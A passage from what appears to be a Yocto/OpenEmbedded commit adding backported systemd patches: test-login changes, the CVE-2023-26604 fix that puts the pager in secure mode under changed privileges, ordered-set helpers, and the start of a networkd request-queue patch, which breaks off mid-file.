+ _cleanup_free_ char *pp = NULL, *qq = NULL,
+@@ -39,65 +44,71 @@ static void test_login(void) {
+ *seat = NULL, *session = NULL,
+ *unit = NULL, *user_unit = NULL, *slice = NULL;
+ int r;
+- uid_t u, u2;
+- char *t, **seats, **sessions;
++ uid_t u, u2 = UID_INVALID;
++ char *t, **seats = NULL, **sessions = NULL;
+
+ r = sd_pid_get_unit(0, &unit);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_unit(0, …) → \"%s\"", strna(unit));
++ log_info("sd_pid_get_unit(0, …) → %s / \"%s\"", e(r), strnull(unit));
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_user_unit(0, &user_unit);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_user_unit(0, …) → \"%s\"", strna(user_unit));
++ log_info("sd_pid_get_user_unit(0, …) → %s / \"%s\"", e(r), strnull(user_unit));
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_slice(0, &slice);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_pid_get_slice(0, …) → \"%s\"", strna(slice));
++ log_info("sd_pid_get_slice(0, …) → %s / \"%s\"", e(r), strnull(slice));
++ assert_se(IN_SET(r, 0, -ENODATA));
++
++ r = sd_pid_get_owner_uid(0, &u2);
++ log_info("sd_pid_get_owner_uid(0, …) → %s / "UID_FMT, e(r), u2);
++ assert_se(IN_SET(r, 0, -ENODATA));
+
+ r = sd_pid_get_session(0, &session);
+- if (r < 0) {
+- log_warning_errno(r, "sd_pid_get_session(0, …): %m");
+- if (r == -ENODATA)
+- log_info("Seems we are not running in a session, skipping some tests.");
+- } else {
+- log_info("sd_pid_get_session(0, …) → \"%s\"", session);
+-
+- assert_se(sd_pid_get_owner_uid(0, &u2) == 0);
+- log_info("sd_pid_get_owner_uid(0, …) → "UID_FMT, u2);
+-
+- assert_se(sd_pid_get_cgroup(0, &cgroup) == 0);
+- log_info("sd_pid_get_cgroup(0, …) → \"%s\"", cgroup);
+-
+- r = sd_uid_get_display(u2, &display_session);
+- assert_se(r >= 0 || r == -ENODATA);
+- log_info("sd_uid_get_display("UID_FMT", …) → \"%s\"",
+- u2, strnull(display_session));
+-
+- assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
+- sd_peer_get_session(pair[0], &pp);
+- sd_peer_get_session(pair[1], &qq);
+- assert_se(streq_ptr(pp, qq));
+-
+- r = sd_uid_get_sessions(u2, false, &sessions);
++ log_info("sd_pid_get_session(0, …) → %s / \"%s\"", e(r), strnull(session));
++
++ r = sd_pid_get_cgroup(0, &cgroup);
++ log_info("sd_pid_get_cgroup(0, …) → %s / \"%s\"", e(r), strnull(cgroup));
++ assert_se(r == 0);
++
++ r = sd_uid_get_display(u2, &display_session);
++ log_info("sd_uid_get_display("UID_FMT", …) → %s / \"%s\"", u2, e(r), strnull(display_session));
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else
++ assert_se(IN_SET(r, 0, -ENODATA));
++
++ assert_se(socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == 0);
++ sd_peer_get_session(pair[0], &pp);
++ sd_peer_get_session(pair[1], &qq);
++ assert_se(streq_ptr(pp, qq));
++
++ r = sd_uid_get_sessions(u2, false, &sessions);
++ assert_se(t = strv_join(sessions, " "));
++ log_info("sd_uid_get_sessions("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else {
+ assert_se(r >= 0);
+ assert_se(r == (int) strv_length(sessions));
+- assert_se(t = strv_join(sessions, " "));
+- strv_free(sessions);
+- log_info("sd_uid_get_sessions("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
+- free(t);
++ }
++ sessions = strv_free(sessions);
++ free(t);
+
+- assert_se(r == sd_uid_get_sessions(u2, false, NULL));
++ assert_se(r == sd_uid_get_sessions(u2, false, NULL));
+
+- r = sd_uid_get_seats(u2, false, &seats);
++ r = sd_uid_get_seats(u2, false, &seats);
++ assert_se(t = strv_join(seats, " "));
++ log_info("sd_uid_get_seats("UID_FMT", …) → %s \"%s\"", u2, e(r), t);
++ if (u2 == UID_INVALID)
++ assert_se(r == -EINVAL);
++ else {
+ assert_se(r >= 0);
+ assert_se(r == (int) strv_length(seats));
+- assert_se(t = strv_join(seats, " "));
+- strv_free(seats);
+- log_info("sd_uid_get_seats("UID_FMT", …) → [%i] \"%s\"", u2, r, t);
+- free(t);
+-
+- assert_se(r == sd_uid_get_seats(u2, false, NULL));
+ }
++ seats = strv_free(seats);
++ free(t);
++
++ assert_se(r == sd_uid_get_seats(u2, false, NULL));
+
+ if (session) {
+ r = sd_session_is_active(session);
+@@ -109,7 +120,7 @@ static void test_login(void) {
+ log_info("sd_session_is_remote(\"%s\") → %s", session, yes_no(r));
+
+ r = sd_session_get_state(session, &state);
+- assert_se(r >= 0);
++ assert_se(r == 0);
+ log_info("sd_session_get_state(\"%s\") → \"%s\"", session, state);
+
+ assert_se(sd_session_get_uid(session, &u) >= 0);
+@@ -123,16 +134,16 @@ static void test_login(void) {
+ log_info("sd_session_get_class(\"%s\") → \"%s\"", session, class);
+
+ r = sd_session_get_display(session, &display);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_display(\"%s\") → \"%s\"", session, strna(display));
+
+ r = sd_session_get_remote_user(session, &remote_user);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_remote_user(\"%s\") → \"%s\"",
+ session, strna(remote_user));
+
+ r = sd_session_get_remote_host(session, &remote_host);
+- assert_se(r >= 0 || r == -ENODATA);
++ assert_se(IN_SET(r, 0, -ENODATA));
+ log_info("sd_session_get_remote_host(\"%s\") → \"%s\"",
+ session, strna(remote_host));
+
+@@ -161,7 +172,7 @@ static void test_login(void) {
+ assert_se(r == -ENODATA);
+ }
+
+- assert_se(sd_uid_get_state(u, &state2) >= 0);
++ assert_se(sd_uid_get_state(u, &state2) == 0);
+ log_info("sd_uid_get_state("UID_FMT", …) → %s", u, state2);
+ }
+
+@@ -173,11 +184,11 @@ static void test_login(void) {
+ assert_se(sd_uid_is_on_seat(u, 0, seat) > 0);
+
+ r = sd_seat_get_active(seat, &session2, &u2);
+- assert_se(r >= 0);
++ assert_se(r == 0);
+ log_info("sd_seat_get_active(\"%s\", …) → \"%s\", "UID_FMT, seat, session2, u2);
+
+ r = sd_uid_is_on_seat(u, 1, seat);
+- assert_se(r >= 0);
++ assert_se(IN_SET(r, 0, 1));
+ assert_se(!!r == streq(session, session2));
+
+ r = sd_seat_get_sessions(seat, &sessions, &uids, &n);
+@@ -185,8 +196,8 @@ static void test_login(void) {
+ assert_se(r == (int) strv_length(sessions));
+ assert_se(t = strv_join(sessions, " "));
+ strv_free(sessions);
+- log_info("sd_seat_get_sessions(\"%s\", …) → %i, \"%s\", [%i] {%s}",
+- seat, r, t, n, format_uids(&buf, uids, n));
++ log_info("sd_seat_get_sessions(\"%s\", …) → %s, \"%s\", [%u] {%s}",
++ seat, e(r), t, n, format_uids(&buf, uids, n));
+ free(t);
+
+ assert_se(sd_seat_get_sessions(seat, NULL, NULL, NULL) == r);
+@@ -204,7 +215,7 @@ static void test_login(void) {
+
+ r = sd_seat_get_active(NULL, &t, NULL);
+ assert_se(IN_SET(r, 0, -ENODATA));
+- log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s", strnull(t));
++ log_info("sd_seat_get_active(NULL, …) (active session on current seat) → %s / \"%s\"", e(r), strnull(t));
+ free(t);
+
+ r = sd_get_sessions(&sessions);
+@@ -244,13 +255,11 @@ static void test_login(void) {
+
+ static void test_monitor(void) {
+ sd_login_monitor *m = NULL;
+- unsigned n;
+ int r;
+
+- r = sd_login_monitor_new("session", &m);
+- assert_se(r >= 0);
++ assert_se(sd_login_monitor_new("session", &m) == 0);
+
+- for (n = 0; n < 5; n++) {
++ for (unsigned n = 0; n < 5; n++) {
+ struct pollfd pollfd = {};
+ usec_t timeout, nw;
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch
new file mode 100644
index 0000000000..f02f62b772
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch
@@ -0,0 +1,182 @@
+From 0a42426d797406b4b01a0d9c13bb759c2629d108 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Wed, 7 Oct 2020 11:15:05 +0200
+Subject: [PATCH] pager: make pager secure when under euid is changed or
+ explicitly requested
+
+The variable is renamed to SYSTEMD_PAGERSECURE (because it's not just about
+less now), and we automatically enable secure mode in certain cases, but not
+otherwise.
+
+This approach is more nuanced, but should provide a better experience for
+users:
+
+- Previously we would set LESSSECURE=1 and trust the pager to make use of
+ it. But this has an effect only on less. We need to not start pagers which
+ are insecure when in secure mode. In particular more is like that and is a
+ very popular pager.
+
+- We don't always enable secure mode, which means that those other pagers can
+  reasonably be used.
+
+- We do the right thing by default, but the user has ultimate control by
+ setting SYSTEMD_PAGERSECURE.
+
+Fixes #5666.
+
+v2:
+- also check $PKEXEC_UID
+
+v3:
+- use 'sd_pid_get_owner_uid() != geteuid()' as the condition
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/0a42426d797406b4b01a0d9c13bb759c2629d108]
+Comments: Hunk refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ man/less-variables.xml | 30 +++++++++++++++----
+ src/shared/pager.c | 63 ++++++++++++++++++++++++++-------------
+ 2 files changed, 66 insertions(+), 27 deletions(-)
+
+diff --git a/man/less-variables.xml b/man/less-variables.xml
+index c52511c..049e9f7 100644
+--- a/man/less-variables.xml
++++ b/man/less-variables.xml
+@@ -65,12 +65,30 @@
+ </varlistentry>
+
+ <varlistentry id='lesssecure'>
+- <term><varname>$SYSTEMD_LESSSECURE</varname></term>
+-
+- <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
+- variable when invoking the pager, which controls the "secure" mode of less (which disables commands
+- such as <literal>|</literal> which allow to easily shell out to external command lines). By default
+- less secure mode is enabled, with this setting it may be disabled.</para></listitem>
++ <term><varname>$SYSTEMD_PAGERSECURE</varname></term>
++
++ <listitem><para>Takes a boolean argument. When true, the "secure" mode of the pager is enabled; if
++ false, disabled. If <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, secure mode is enabled
++ if the effective UID is not the same as the owner of the login session, see <citerefentry
++ project='man-pages'><refentrytitle>geteuid</refentrytitle><manvolnum>2</manvolnum></citerefentry> and
++ <citerefentry><refentrytitle>sd_pid_get_owner_uid</refentrytitle><manvolnum>3</manvolnum></citerefentry>.
++ In secure mode, <option>LESSSECURE=1</option> will be set when invoking the pager, and the pager shall
++ disable commands that open or create new files or start new subprocesses. When
++ <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, pagers which are not known to implement
++ secure mode will not be used. (Currently only
++ <citerefentry><refentrytitle>less</refentrytitle><manvolnum>1</manvolnum></citerefentry> implements
++ secure mode.)</para>
++
++ <para>Note: when commands are invoked with elevated privileges, for example under <citerefentry
++ project='man-pages'><refentrytitle>sudo</refentrytitle><manvolnum>8</manvolnum></citerefentry> or
++ <citerefentry
++ project='die-net'><refentrytitle>pkexec</refentrytitle><manvolnum>1</manvolnum></citerefentry>, care
++ must be taken to ensure that unintended interactive features are not enabled. "Secure" mode for the
++ pager may be enabled automatically as describe above. Setting <varname>SYSTEMD_PAGERSECURE=0</varname>
++ or not removing it from the inherited environment allows the user to invoke arbitrary commands. Note
++ that if the <varname>$SYSTEMD_PAGER</varname> or <varname>$PAGER</varname> variables are to be
++ honoured, <varname>$SYSTEMD_PAGERSECURE</varname> must be set too. It might be reasonable to completly
++ disable the pager using <option>--no-pager</option> instead.</para></listitem>
+ </varlistentry>
+
+ <varlistentry id='colors'>
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index a3b6576..a72d9ea 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -8,6 +8,8 @@
+ #include <sys/prctl.h>
+ #include <unistd.h>
+
++#include "sd-login.h"
++
+ #include "copy.h"
+ #include "env-util.h"
+ #include "fd-util.h"
+@@ -164,25 +166,42 @@ int pager_open(PagerFlags flags) {
+ }
+
+ /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
+- * privileged stuff. */
+- r = getenv_bool("SYSTEMD_LESSSECURE");
+- if (r == 0) { /* Remove env var if off */
+- if (unsetenv("LESSSECURE") < 0) {
+- log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
+- _exit(EXIT_FAILURE);
+- }
+- } else {
+- /* Set env var otherwise */
++ * privileged stuff. If the user set $SYSTEMD_PAGERSECURE, trust their configuration of the
++ * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
++ * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
++ * know to be good. */
++ int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
++ bool trust_pager = use_secure_mode >= 0;
++ if (use_secure_mode == -ENXIO) {
++ uid_t uid;
++
++ r = sd_pid_get_owner_uid(0, &uid);
+ if (r < 0)
+- log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
++ log_debug_errno(r, "sd_pid_get_owner_uid() failed, enabling pager secure mode: %m");
+
+- if (setenv("LESSSECURE", "1", 1) < 0) {
+- log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
+- _exit(EXIT_FAILURE);
+- }
++ use_secure_mode = r < 0 || uid != geteuid();
++
++ } else if (use_secure_mode < 0) {
++ log_warning_errno(use_secure_mode, "Unable to parse $SYSTEMD_PAGERSECURE, assuming true: %m");
++ use_secure_mode = true;
+ }
+
+- if (pager_args) {
++ /* We generally always set variables used by less, even if we end up using a different pager.
++ * They shouldn't hurt in any case, and ideally other pagers would look at them too. */
++ if (use_secure_mode)
++ r = setenv("LESSSECURE", "1", 1);
++ else
++ r = unsetenv("LESSSECURE");
++ if (r < 0) {
++ log_error_errno(errno, "Failed to adjust environment variable LESSSECURE: %m");
++ _exit(EXIT_FAILURE);
++ }
++
++ if (trust_pager && pager_args) { /* The pager config might be set globally, and we cannot
++ * know if the user adjusted it to be appropriate for the
++ * secure mode. Thus, start the pager specified through
++ * envvars only when $SYSTEMD_PAGERSECURE was explicitly set
++ * as well. */
+ r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");
+@@ -194,13 +213,14 @@ int pager_open(PagerFlags flags) {
+ "Failed to execute '%s', using fallback pagers: %m", pager_args[0]);
+ }
+
+- /* Debian's alternatives command for pagers is
+- * called 'pager'. Note that we do not call
+- * sensible-pagers here, since that is just a
+- * shell script that implements a logic that
+- * is similar to this one anyway, but is
+- * Debian-specific. */
++ /* Debian's alternatives command for pagers is called 'pager'. Note that we do not call
++ * sensible-pagers here, since that is just a shell script that implements a logic that is
++ * similar to this one anyway, but is Debian-specific. */
+ FOREACH_STRING(exe, "pager", "less", "more") {
++ /* Only less implements secure mode right now. */
++ if (use_secure_mode && !streq(exe, "less"))
++ continue;
++
+ r = loop_write(exe_name_pipe[1], exe, strlen(exe) + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");
+@@ -211,6 +231,7 @@ int pager_open(PagerFlags flags) {
+ "Failed to execute '%s', using next fallback pager: %m", exe);
+ }
+
++ /* Our builtin is also very secure. */
+ r = loop_write(exe_name_pipe[1], "(built-in)", strlen("(built-in)") + 1, false);
+ if (r < 0) {
+ log_error_errno(r, "Failed to write pager name to socket: %m");
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch
new file mode 100644
index 0000000000..bc6b0a91c2
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch
@@ -0,0 +1,32 @@
+From b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Thu, 15 Oct 2020 10:54:48 +0200
+Subject: [PATCH] pager: lets check SYSTEMD_PAGERSECURE with secure_getenv()
+
+I can't think of any real vulnerability about this, but it still feels
+better to check a variable with "secure" in its name with
+secure_getenv() rather than plain getenv().
+
+Paranoia FTW!
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17359/commits/b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c]
+Comments: Hunk refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ src/shared/pager.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index a72d9ea..250519c 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -170,7 +170,7 @@ int pager_open(PagerFlags flags) {
+ * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
+ * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
+ * know to be good. */
+- int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
++ int use_secure_mode = getenv_bool_secure("SYSTEMD_PAGERSECURE");
+ bool trust_pager = use_secure_mode >= 0;
+ if (use_secure_mode == -ENXIO) {
+ uid_t uid;
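
Taken together, the four CVE-2023-26604 patches make the pager decision roughly: honour an explicit $SYSTEMD_PAGERSECURE read via secure_getenv(), otherwise fall back to secure mode whenever the effective UID does not match the session owner, and export LESSSECURE accordingly. Below is a simplified standalone sketch of that flow; parse_bool() is an invented stand-in for getenv_bool(), and a plain getuid()/geteuid() comparison stands in for sd_pid_get_owner_uid() so the sketch needs no libsystemd.

/* Simplified standalone sketch of the combined behaviour, not the systemd
 * implementation. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static int parse_bool(const char *s) {
        if (!s)
                return -1;              /* unset */
        if (strcmp(s, "1") == 0 || strcmp(s, "yes") == 0 || strcmp(s, "true") == 0)
                return 1;
        if (strcmp(s, "0") == 0 || strcmp(s, "no") == 0 || strcmp(s, "false") == 0)
                return 0;
        return -1;
}

int main(void) {
        /* secure_getenv() returns NULL in privilege-elevated contexts, so a
         * hostile caller cannot force secure mode off that way. */
        int use_secure = parse_bool(secure_getenv("SYSTEMD_PAGERSECURE"));

        if (use_secure < 0)
                /* Not configured: autodetect, erring on the side of secure. */
                use_secure = getuid() != geteuid();

        if (use_secure)
                setenv("LESSSECURE", "1", 1);   /* less disables '|', '!', ... */
        else
                unsetenv("LESSSECURE");

        printf("pager secure mode: %s\n", use_secure ? "on" : "off");
        /* A real implementation would now exec the pager, skipping pagers not
         * known to implement a secure mode. */
        return 0;
}
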
diff --git a/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch b/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch
new file mode 100644
index 0000000000..86d9b0499a
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch
@@ -0,0 +1,78 @@
+From 1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 1 Sep 2020 12:42:35 +0200
+Subject: [PATCH] basic: pass allocation info for ordered_set_new() and
+ introduce ordered_set_ensure_put()
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/ordered-set.c | 21 +++++++++++++++++++++
+ src/basic/ordered-set.h | 18 +++++++-----------
+ 2 files changed, 28 insertions(+), 11 deletions(-)
+
+diff --git a/src/basic/ordered-set.c b/src/basic/ordered-set.c
+index 7fdb47e064..fb82c17b5a 100644
+--- a/src/basic/ordered-set.c
++++ b/src/basic/ordered-set.c
+@@ -4,6 +4,27 @@
+ #include "ordered-set.h"
+ #include "strv.h"
+
++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) {
++ if (*s)
++ return 0;
++
++ *s = _ordered_set_new(ops HASHMAP_DEBUG_PASS_ARGS);
++ if (!*s)
++ return -ENOMEM;
++
++ return 0;
++}
++
++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS) {
++ int r;
++
++ r = _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_PASS_ARGS);
++ if (r < 0)
++ return r;
++
++ return ordered_set_put(*s, p);
++}
++
+ int ordered_set_consume(OrderedSet *s, void *p) {
+ int r;
+
+diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
+index a42a57eb49..2c241a808b 100644
+--- a/src/basic/ordered-set.h
++++ b/src/basic/ordered-set.h
+@@ -7,20 +7,16 @@
+
+ typedef struct OrderedSet OrderedSet;
+
+-static inline OrderedSet* ordered_set_new(const struct hash_ops *ops) {
+- return (OrderedSet*) ordered_hashmap_new(ops);
++static inline OrderedSet* _ordered_set_new(const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) {
++ return (OrderedSet*) internal_ordered_hashmap_new(ops HASHMAP_DEBUG_PASS_ARGS);
+ }
++#define ordered_set_new(ops) _ordered_set_new(ops HASHMAP_DEBUG_SRC_ARGS)
+
+-static inline int ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops) {
+- if (*s)
+- return 0;
++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS);
++#define ordered_set_ensure_allocated(s, ops) _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_SRC_ARGS)
+
+- *s = ordered_set_new(ops);
+- if (!*s)
+- return -ENOMEM;
+-
+- return 0;
+-}
++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS);
++#define ordered_set_ensure_put(s, hash_ops, key) _ordered_set_ensure_put(s, hash_ops, key HASHMAP_DEBUG_SRC_ARGS)
+
+ static inline OrderedSet* ordered_set_free(OrderedSet *s) {
+ return (OrderedSet*) ordered_hashmap_free((OrderedHashmap*) s);
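
ordered_set_ensure_put() folds the common "allocate the set on first use, then insert" sequence into one call, which the networkd request-queue patches further down rely on. The sketch below shows the same pattern on a deliberately tiny array-backed container; Set, set_put() and set_ensure_put() are invented for the example and are not systemd's OrderedSet API.

/* Toy standalone sketch of the "ensure allocated, then put" pattern: the
 * container is allocated lazily on first insertion. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

typedef struct Set {
        void **items;
        size_t n, alloc;
} Set;

static int set_put(Set *s, void *p) {
        if (s->n == s->alloc) {
                size_t na = s->alloc > 0 ? s->alloc * 2 : 4;
                void **t = realloc(s->items, na * sizeof(void *));
                if (!t)
                        return -ENOMEM;
                s->items = t;
                s->alloc = na;
        }
        s->items[s->n++] = p;
        return 1;
}

static int set_ensure_put(Set **s, void *p) {
        if (!*s) {
                *s = calloc(1, sizeof(Set));
                if (!*s)
                        return -ENOMEM;
        }
        return set_put(*s, p);
}

int main(void) {
        Set *s = NULL;                  /* lazily allocated, as in manager code */
        int values[] = { 1, 2, 3 };

        for (size_t i = 0; i < 3; i++)
                if (set_ensure_put(&s, &values[i]) < 0)
                        return 1;

        printf("set holds %zu entries\n", s->n);
        free(s->items);
        free(s);
        return 0;
}
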
diff --git a/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch b/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch
new file mode 100644
index 0000000000..42b6e05b55
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch
@@ -0,0 +1,35 @@
+From d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 26 Apr 2021 23:52:40 +0900
+Subject: [PATCH] ordered-set: introduce
+ ordered_set_clear/free_with_destructor()
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/ordered-set.h | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
+index a377f20b1f..64df41766f 100644
+--- a/src/basic/ordered-set.h
++++ b/src/basic/ordered-set.h
+@@ -63,6 +63,17 @@ void ordered_set_print(FILE *f, const char *field, OrderedSet *s);
+ #define ORDERED_SET_FOREACH(e, s, i) \
+ for ((i) = ITERATOR_FIRST; ordered_set_iterate((s), &(i), (void**)&(e)); )
+
++#define ordered_set_clear_with_destructor(s, f) \
++ ({ \
++ OrderedSet *_s = (s); \
++ void *_item; \
++ while ((_item = ordered_set_steal_first(_s))) \
++ f(_item); \
++ _s; \
++ })
++#define ordered_set_free_with_destructor(s, f) \
++ ordered_set_free(ordered_set_clear_with_destructor(s, f))
++
+ DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free);
+ DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free_free);
+
diff --git a/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch b/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch
new file mode 100644
index 0000000000..06c523834d
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch
@@ -0,0 +1,285 @@
+From 19d9a5adf0c1a6b5a243eea0390f6f6526d569de Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Fri, 7 May 2021 15:39:16 +0900
+Subject: [PATCH] network: add skeleton of request queue
+
+This will be used in later commits.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/19d9a5adf0c1a6b5a243eea0390f6f6526d569de]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/meson.build | 2 +
+ src/network/networkd-link.c | 20 +++++-
+ src/network/networkd-manager.c | 7 ++
+ src/network/networkd-manager.h | 2 +
+ src/network/networkd-queue.c | 121 +++++++++++++++++++++++++++++++++
+ src/network/networkd-queue.h | 42 ++++++++++++
+ 6 files changed, 192 insertions(+), 2 deletions(-)
+ create mode 100644 src/network/networkd-queue.c
+ create mode 100644 src/network/networkd-queue.h
+
+diff --git a/src/network/meson.build b/src/network/meson.build
+index 4fca3106dc..a8b9232e64 100644
+--- a/src/network/meson.build
++++ b/src/network/meson.build
+@@ -105,6 +105,8 @@ sources = files('''
+ networkd-network.h
+ networkd-nexthop.c
+ networkd-nexthop.h
++ networkd-queue.c
++ networkd-queue.h
+ networkd-route.c
+ networkd-route.h
+ networkd-routing-policy-rule.c
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 34359b2541..2f33305a27 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -30,6 +30,7 @@
+ #include "networkd-manager.h"
+ #include "networkd-ndisc.h"
+ #include "networkd-neighbor.h"
++#include "networkd-queue.h"
+ #include "networkd-radv.h"
+ #include "networkd-routing-policy-rule.h"
+ #include "networkd-wifi.h"
+
+@@ -2232,6 +2244,8 @@ static int link_reconfigure_internal(Link *link, sd_netlink_message *m, bool for
+ if (r < 0)
+ return r;
+
++ link_drop_requests(link);
++
+ r = link_drop_config(link);
+ if (r < 0)
+ return r;
+@@ -2664,6 +2678,8 @@ static int link_carrier_lost(Link *link) {
+ return r;
+ }
+
++ link_drop_requests(link);
++
+ r = link_drop_config(link);
+ if (r < 0)
+ return r;
+diff --git a/src/network/networkd-manager.c b/src/network/networkd-manager.c
+index 562ce5ca54..fd576169a9 100644
+--- a/src/network/networkd-manager.c
++++ b/src/network/networkd-manager.c
+@@ -34,6 +34,7 @@
+ #include "networkd-manager-bus.h"
+ #include "networkd-manager.h"
+ #include "networkd-network-bus.h"
++#include "networkd-queue.h"
+ #include "networkd-speed-meter.h"
+ #include "ordered-set.h"
+ #include "path-util.h"
+@@ -406,6 +407,10 @@ int manager_new(Manager **ret) {
+ if (r < 0)
+ return r;
+
++ r = sd_event_add_post(m->event, NULL, manager_process_requests, m);
++ if (r < 0)
++ return r;
++
+ r = manager_connect_rtnl(m);
+ if (r < 0)
+ return r;
+@@ -446,6 +451,8 @@ Manager* manager_free(Manager *m) {
+
+ free(m->state_file);
+
++ m->request_queue = ordered_set_free_with_destructor(m->request_queue, request_free);
++
+ while ((a = hashmap_first_key(m->dhcp6_prefixes)))
+ (void) dhcp6_prefix_remove(m, a);
+ m->dhcp6_prefixes = hashmap_free(m->dhcp6_prefixes);
+diff --git a/src/network/networkd-manager.h b/src/network/networkd-manager.h
+index 301b97c1a1..26e8802871 100644
+--- a/src/network/networkd-manager.h
++++ b/src/network/networkd-manager.h
+@@ -91,6 +91,8 @@ struct Manager {
+ usec_t speed_meter_usec_old;
+
